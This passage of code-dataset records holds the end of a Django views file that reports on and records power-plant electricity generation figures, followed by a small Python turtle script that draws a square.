model_name = model_map[operation_type]\n except Exception:\n pass\n if model_name:\n target_val = []\n # 判断开始时间与结束时间是否在同一年\n start_date_year = start_date.year\n end_date_year = end_date.year\n delta_year = end_date_year - start_date_year\n if delta_year == 0: # 同一年\n target_val = getmodels(model_name, str(start_date_year)).objects.exclude(state=\"9\").filter(\n Q(datadate__gte=start_date.date()) & Q(datadate__lte=end_date.date())\n ).values(\n \"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n\n else:\n # 开始时间到年底\n start_target_val = getmodels(model_name, str(start_date_year)).objects.exclude(state=\"9\").filter(datadate__gte=start_date.date()).values(\n \"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n\n # 结束时间到年初\n end_target_val = getmodels(model_name, str(end_date_year)).objects.exclude(state=\"9\").filter(datadate__lte=end_date.date()).values(\n \"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n target_val.extend(start_target_val)\n target_val.extend(end_target_val)\n # 2017 2019 2\n if delta_year > 1: # 隔年\n for i in range(0, delta_year):\n start_date_year += 1\n start_date = datetime.datetime(start_date_year, 1, 1)\n middle_target_val = getmodels(model_name, str(start_date_year)).objects.exclude(state=\"9\").filter(datadate__gte=start_date.date()).values(\n \"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n if middle_target_val:\n target_val.extend(middle_target_val)\n else: # 跨年\n pass\n data = [{\n \"id\": tv[\"target_id\"],\n \"cumulative\": tv[\"target__cumulative\"],\n \"curvalue\": float(round(tv[\"curvalue\"] if tv[\"curvalue\"] else 0, tv[\"target__digit\"])),\n \"cumulativemonth\": float(round(tv[\"cumulativemonth\"] if tv[\"cumulativemonth\"] else 0, tv[\"target__digit\"])),\n \"cumulativequarter\": float(round(tv[\"cumulativequarter\"] if tv[\"cumulativequarter\"] else 0, tv[\"target__digit\"])),\n \"cumulativehalfyear\": float(round(tv[\"cumulativehalfyear\"] if tv[\"cumulativehalfyear\"] else 0, tv[\"target__digit\"])),\n \"cumulativeyear\": float(round(tv[\"cumulativeyear\"] if tv[\"cumulativeyear\"] else 0, tv[\"target__digit\"])),\n \"date\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_val]\n return sorted(data, key=lambda e: e.__getitem__('date'), reverse=True)\n\n meter_data = get_target_values('1', start_date, end_date, date_type)\n entry_data = get_target_values('15', start_date, end_date, date_type)\n extract_data = get_target_values('16', start_date, end_date, date_type)\n calculate_data = get_target_values('17', start_date, end_date, date_type)\n\n all_data = {\n \"1\": meter_data,\n \"15\": entry_data,\n \"16\": extract_data,\n \"17\": calculate_data,\n }\n\n # head_data\n for cd in col_data:\n head_targets = []\n col_name = cd[\"name\"]\n targets = cd[\"targets\"]\n colspan = len(targets)\n if colspan > 1:\n rowspan = 1\n else:\n rowspan = 2\n for target in targets:\n target_unity = Target.objects.filter(id=target['target_id']).first().unity\n target_name = target['target_name'] + ' (' + target_unity + ')'\n target['new_target_name'] = target_name\n head_targets.append(target)\n\n head_data.append({\n \"col_name\": col_name,\n \"rowspan\": rowspan,\n \"colspan\": colspan,\n \"targets\": head_targets\n })\n\n # body_data\n # 时间列表\n def get_date_list_during_period(start_time, end_time, date_type):\n \"\"\"\n 不同周期类型下,指定时间区间获取时间列表\n 日:每日\n 月:月最后一天\n 季:季最后一天\n 半年:半年最后一天\n 年:年最后一天\n @param start_time:\n @param end_time:\n @param date_type:\n @return date_list:\n \"\"\"\n date_list = []\n\n n = 0\n n_time = end_time\n if date_type == \"10\":\n while True:\n date_list.append(n_time)\n\n n_time -= datetime.timedelta(days=1)\n\n if n_time < start_time or n > 3 * 365: # 最大循环\n break\n n += 1\n if date_type == \"11\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=1)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or n > 3 * 365:\n break\n n += 1\n if date_type == \"12\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=3)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or n > 3 * 365:\n break\n n += 1\n if date_type == \"13\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=6)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or n > 3 * 365:\n break\n n += 1\n if date_type == \"14\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=12)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or n > 2000:\n break\n n += 1\n\n return date_list\n\n date_list = get_date_list_during_period(start_date, end_date, date_type)\n\n all_targets = Target.objects.exclude(state=\"9\").values(\n \"id\", \"name\", \"operationtype\", \"cumulative\"\n )\n\n def get_target_info(target_id: str) -> dict:\n target_info = {}\n for t in all_targets:\n if str(t['id']) == target_id:\n target_info = t\n break\n return target_info\n\n def handle_target_data(date):\n target_values = []\n\n for cd in col_data:\n targets = cd[\"targets\"]\n for target in targets:\n target_id = target[\"target_id\"]\n target_cumulative = get_target_info(target_id).get(\"cumulative\", \"\")\n operation_type = get_target_info(target_id).get(\"operationtype\", \"\")\n try:\n cur_data = all_data[operation_type]\n except Exception:\n pass\n else:\n has_value = False\n for d in cur_data:\n if str(d[\"id\"]) == target_id and d[\"date\"] == \"{:%Y-%m-%d}\".format(date):\n # 判断取的值类型\n if target[\"cumulative_type\"] == \"0\":\n target_values.append({\n \"value\": d[\"curvalue\"],\n \"cumulative\": d[\"cumulative\"],\n })\n if target[\"cumulative_type\"] == \"1\":\n target_values.append({\n \"value\": d[\"cumulativemonth\"],\n \"cumulative\": d[\"cumulative\"],\n })\n if target[\"cumulative_type\"] == \"2\":\n target_values.append({\n \"value\": d[\"cumulativequarter\"],\n \"cumulative\": d[\"cumulative\"],\n })\n if target[\"cumulative_type\"] == \"3\":\n target_values.append({\n \"value\": d[\"cumulativehalfyear\"],\n \"cumulative\": d[\"cumulative\"],\n })\n if target[\"cumulative_type\"] == \"4\":\n target_values.append({\n \"value\": d[\"cumulativeyear\"],\n \"cumulative\": d[\"cumulative\"],\n })\n has_value = True\n break\n if not has_value:\n target_values.append({\n \"value\": \"-\",\n \"cumulative\": \"\",\n })\n if target_values:\n return {\n \"date\": \"{:%Y-%m-%d}\".format(date),\n \"target_values\": target_values\n }\n\n pool = ThreadPoolExecutor(max_workers=100)\n all_tasks = [pool.submit(handle_target_data, date) for date in date_list]\n for future in as_completed(all_tasks):\n if future.result():\n body_data.append(future.result())\n\n body_data = sorted(body_data, key=lambda e: e.__getitem__('date'), reverse=False)\n # 合计(判断求和/平均)\n if body_data:\n target_values_length = len(body_data[0][\"target_values\"])\n for i in range(0, target_values_length):\n v_sum = decimal.Decimal('0')\n cumulative = \"\"\n in_sum = 0 # 参与合计的数量\n for bd in body_data:\n target_values = bd[\"target_values\"]\n c_v = target_values[i].get(\"value\", \"-\")\n pre_cumulative = target_values[i].get(\"cumulative\", \"-\")\n if pre_cumulative not in [\"-\", \"\"]:\n cumulative = pre_cumulative\n if type(c_v) != str and c_v:\n v_sum += decimal.Decimal(str(c_v))\n in_sum += 1\n if cumulative == \"1\" or cumulative == \"5\": # 1:求和,5:求和(上月)/(煤机环保专用)\n pass\n if cumulative in [\"0\", \"2\", \"4\"]: # 0:不累计,2:算数平均, 3:非零算数平均\n v_sum = v_sum / decimal.Decimal(str(in_sum)) if in_sum else 0\n v_sum = round(v_sum, 4)\n if cumulative == \"3\": # 加权平均->待\n v_sum = \"/\"\n v_sums.append({\n \"v\": float(v_sum) if v_sum or v_sum != \"/\" else \"/\"\n }) # 合计里放个总计类型\n except Exception as e:\n status = 0\n info = \"获取报表数据失败{0}\".format(e)\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": {\n \"head_data\": head_data,\n \"body_data\": body_data,\n \"v_sums\": v_sums,\n }\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef electric_energy(request, funid):\n if request.user.is_authenticated():\n yestoday = \"{:%Y-%m-%d}\".format(datetime.datetime.now() - datetime.timedelta(days=1))\n\n return render(request, \"electric_energy.html\", {\n \"yestoday\": yestoday,\n \"username\": request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid, request)\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_electric_energy_target_info():\n \"\"\"\n 获取发电量指标的相关信息,如保留位数\n :return:\n \"\"\"\n f_info = {\n \"digit\": 2,\n }\n s_info = {\n \"digit\": 2,\n }\n F_ELERTRIC_ENERGY = settings.F_ELERTRIC_ENERGY\n S_ELERTRIC_ENERGY = settings.S_ELERTRIC_ENERGY\n\n f_targets = Target.objects.exclude(state=\"9\").filter(code=F_ELERTRIC_ENERGY)\n\n if f_targets.exists():\n f_target = f_targets[0]\n f_info[\"digit\"] = f_target.digit\n\n s_targets = Target.objects.exclude(state=\"9\").filter(code=S_ELERTRIC_ENERGY)\n if s_targets:\n s_target = s_targets[0]\n s_info[\"digit\"] = s_target.digit\n\n return f_info, s_info\n\n\ndef get_electric_energy(request):\n if request.user.is_authenticated():\n result = []\n\n # #1发电量 #2发电量 保留位数\n f_info, s_info = get_electric_energy_target_info()\n f_digit = f_info.get('digit', 2)\n s_digit = s_info.get('digit', 2)\n electric_energys = ElectricEnergy.objects.exclude(state=\"9\").order_by(\"-extract_time\")\n for electric_energy in electric_energys:\n f_electric_energy = float(round(electric_energy.f_electric_energy, f_digit)) if electric_energy.f_electric_energy else 0\n s_electric_energy = float(round(electric_energy.s_electric_energy, s_digit)) if electric_energy.s_electric_energy else 0\n result.append({\n \"id\": electric_energy.id,\n \"extract_time\": \"{0:%Y-%m-%d}\".format(electric_energy.extract_time) if electric_energy.extract_time else \"\",\n \"f_electric_energy\": f_electric_energy,\n \"s_electric_energy\": s_electric_energy,\n \"a_electric_energy\": round(f_electric_energy + s_electric_energy, f_digit),\n })\n return JsonResponse({\n \"data\": result\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef save_electric_energy(request):\n if request.user.is_authenticated():\n status = 1\n info = \"保存成功。\"\n f_electric_energy = request.POST.get(\"f_electric_energy\", \"\")\n s_electric_energy = request.POST.get(\"s_electric_energy\", \"\")\n extract_time = request.POST.get(\"extract_time\", \"\")\n f_is_open = request.POST.get(\"f_is_open\", \"\")\n s_is_open = request.POST.get(\"s_is_open\", \"\")\n\n f_electric_energy = decimal.Decimal(f_electric_energy if f_electric_energy else \"0\")\n s_electric_energy = decimal.Decimal(s_electric_energy if s_electric_energy else \"0\")\n\n # 未启动\n if f_is_open == \"0\":\n f_electric_energy = decimal.Decimal(\"0\")\n if s_is_open == \"0\":\n s_electric_energy = decimal.Decimal(\"0\")\n\n a_electric_energy = f_electric_energy + s_electric_energy\n\n try:\n extract_time = datetime.datetime.strptime(extract_time, \"%Y-%m-%d\")\n except ValueError as e:\n print(e)\n info = \"网络异常。\"\n status = 0\n else:\n with transaction.atomic():\n # 删除该天其他数据\n ElectricEnergy.objects.filter(extract_time=extract_time).update(**{\n \"state\": \"9\"\n })\n\n ElectricEnergy.objects.create(**{\n \"f_electric_energy\": f_electric_energy,\n \"s_electric_energy\": s_electric_energy,\n \"a_electric_energy\": a_electric_energy,\n \"extract_time\": extract_time,\n })\n\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef electric_energy_del(request):\n if request.user.is_authenticated():\n status = 1\n info = '删除成功。'\n id = request.POST.get('id', '')\n try:\n ElectricEnergy.objects.filter(id=int(id)).update(**{\n \"state\": \"9\"\n })\n except:\n status = 0\n info = '删除失败。'\n\n return JsonResponse({\n 'status': status,\n 'info': info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef extract_electric_energy(request):\n \"\"\"\n 手动提取指定时间段的发电量\n @param request:\n @return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = '提取成功。'\n data = {}\n\n def check_time(start_time, end_time):\n \"\"\"\n 检测时间\n @param start_time:\n @param end_time:\n @return is_fine:\n \"\"\"\n is_fine = True\n err = ''\n if not start_time:\n is_fine = False\n err = \"开始时间未选择\"\n elif not end_time:\n is_fine = False\n err = \"结束时间未选择\"\n else:\n start_time = datetime.datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n if start_time > end_time:\n is_fine = False\n err = \"开始时间不得晚于结束时间\"\n return is_fine, err\n\n def do_extract(start_time, end_time, f=True):\n \"\"\"\n #1机组 #2机组 发电量取数\n @param start_time:\n @param end_time:\n @param f: f表示#1机组 s表示#2机组\n @return: electric_energy_value\n \"\"\"\n electric_energy_value = 0\n\n if f: # #1\n t_code = settings.F_ELERTRIC_ENERGY\n t_tag = settings.F_TAG\n else: # #2\n t_code = settings.S_ELERTRIC_ENERGY\n t_tag = settings.S_TAG\n\n ts = Target.objects.exclude(state=\"9\").filter(code=t_code)\n if ts.exists():\n t = ts[0]\n\n s_con = settings.PI_SERVER\n\n if s_con:\n try:\n s_con = eval(s_con)\n if type(s_con) == list:\n s_con = s_con[0]\n except Exception as e:\n pass\n else:\n pi_query = PIQuery(s_con)\n result, err = pi_query.get_delta_time_data(start_time, end_time, t, t_tag)\n if not err and result:\n electric_energy_value = result[0][0]\n return electric_energy_value\n\n f_checkbox = request.POST.get('f_checkbox', '')\n s_checkbox = request.POST.get('s_checkbox', '')\n\n f_start_time1 = request.POST.get('f_start_time1', '')\n f_start_time2 = request.POST.get('f_start_time2', '')\n f_start_time3 = request.POST.get('f_start_time3', '')\n f_start_time4 = request.POST.get('f_start_time4', '')\n\n f_end_time1 = request.POST.get('f_end_time1', '')\n f_end_time2 = request.POST.get('f_end_time2', '')\n f_end_time3 = request.POST.get('f_end_time3', '')\n f_end_time4 = request.POST.get('f_end_time4', '')\n\n s_start_time1 = request.POST.get('s_start_time1', '')\n s_start_time2 = request.POST.get('s_start_time2', '')\n s_start_time3 = request.POST.get('s_start_time3', '')\n s_start_time4 = request.POST.get('s_start_time4', '')\n\n s_end_time1 = request.POST.get('s_end_time1', '')\n s_end_time2 = request.POST.get('s_end_time2', '')\n s_end_time3 = request.POST.get('s_end_time3', '')\n s_end_time4 = request.POST.get('s_end_time4', '')\n\n f_electric_energy = decimal.Decimal(\"0\")\n s_electric_energy = decimal.Decimal(\"0\")\n if f_checkbox == \"on\":\n if not any([f_start_time1, f_start_time2, f_start_time3, f_start_time4,\n f_end_time1, f_end_time2, f_end_time3, f_end_time4]):\n return JsonResponse({\n 'status': 0,\n 'info': '开机状态时,#1机组入网时间至少要选择一组。'\n })\n\n if any([f_start_time1, f_end_time1]):\n is_fine, err = check_time(f_start_time1, f_end_time1)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#1机组入网时间1{0}。'.format(err),\n })\n else:\n f_electric_energy += do_extract(f_start_time1, f_end_time1, f=True)\n if any([f_start_time2, f_end_time2]):\n is_fine, err = check_time(f_start_time2, f_end_time2)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#1机组入网时间2{0}。'.format(err),\n })\n else:\n f_electric_energy += do_extract(f_start_time2, f_end_time2, f=True)\n if any([f_start_time3, f_end_time3]):\n is_fine, err = check_time(f_start_time3, f_end_time3)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#1机组入网时间3{0}。'.format(err),\n })\n else:\n f_electric_energy += do_extract(f_start_time3, f_end_time3, f=True)\n if any([f_start_time4, f_end_time4]):\n is_fine, err = check_time(f_start_time4, f_end_time4)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#1机组入网时间4{0}。'.format(err),\n })\n else:\n f_electric_energy += do_extract(f_start_time4, f_end_time4, f=True)\n if s_checkbox == \"on\":\n if not any([s_start_time1, s_start_time2, s_start_time3, s_start_time4,\n s_end_time1, s_end_time2, s_end_time3, s_end_time4]):\n return JsonResponse({\n 'status': 0,\n 'info': '开机状态时,#2机组入网时间至少要选择一组。'\n })\n if any([s_start_time1, s_end_time1]):\n is_fine, err = check_time(s_start_time1, s_end_time1)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#2机组入网时间1{0}。'.format(err),\n })\n else:\n s_electric_energy += do_extract(s_start_time1, s_end_time1, f=False)\n if any([s_start_time2, s_end_time2]):\n is_fine, err = check_time(s_start_time2, s_end_time2)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#2机组入网时间2{0}。'.format(err),\n })\n else:\n s_electric_energy += do_extract(s_start_time2, s_end_time2, f=False)\n if any([s_start_time3, s_end_time3]):\n is_fine, err = check_time(s_start_time3, s_end_time3)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#2机组入网时间3{0}。'.format(err),\n })\n else:\n s_electric_energy += do_extract(s_start_time3, s_end_time3, f=False)\n if any([s_start_time4, s_end_time4]):\n is_fine, err = check_time(s_start_time4, s_end_time4)\n if not is_fine:\n return JsonResponse({\n 'status': 0,\n 'info': '提取失败,#2机组入网时间4{0}。'.format(err),\n })\n else:\n s_electric_energy += do_extract(s_start_time4, s_end_time4, f=False)\n\n return JsonResponse({\n 'status': status,\n 'info': info,\n 'data': {\n 'f_electric_energy': float(f_electric_energy),\n 's_electric_energy': float(s_electric_energy)\n },\n })\n else:\n return HttpResponseRedirect(\"/login\")\n","sub_path":"datacenter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":552059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"203486653","text":"import turtle\r\n\r\ndef draw_square():\r\n window=turtle.Screen()\r\n window.bgcolor(\"red\")\r\n\r\n brad= turtle.Turtle()\r\n brad.shape(\"turtle\")\r\n brad.color(\"green\")\r\n brad.speed (2)\r\n\r\n line=1\r\n while line < 5:\r\n brad.forward(100)\r\n brad.right(90)\r\n line=line+1\r\n\r\n window.exitonclick()\r\n \r\n\r\ndraw_square()\r\n","sub_path":"3_mindstorms.py","file_name":"3_mindstorms.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}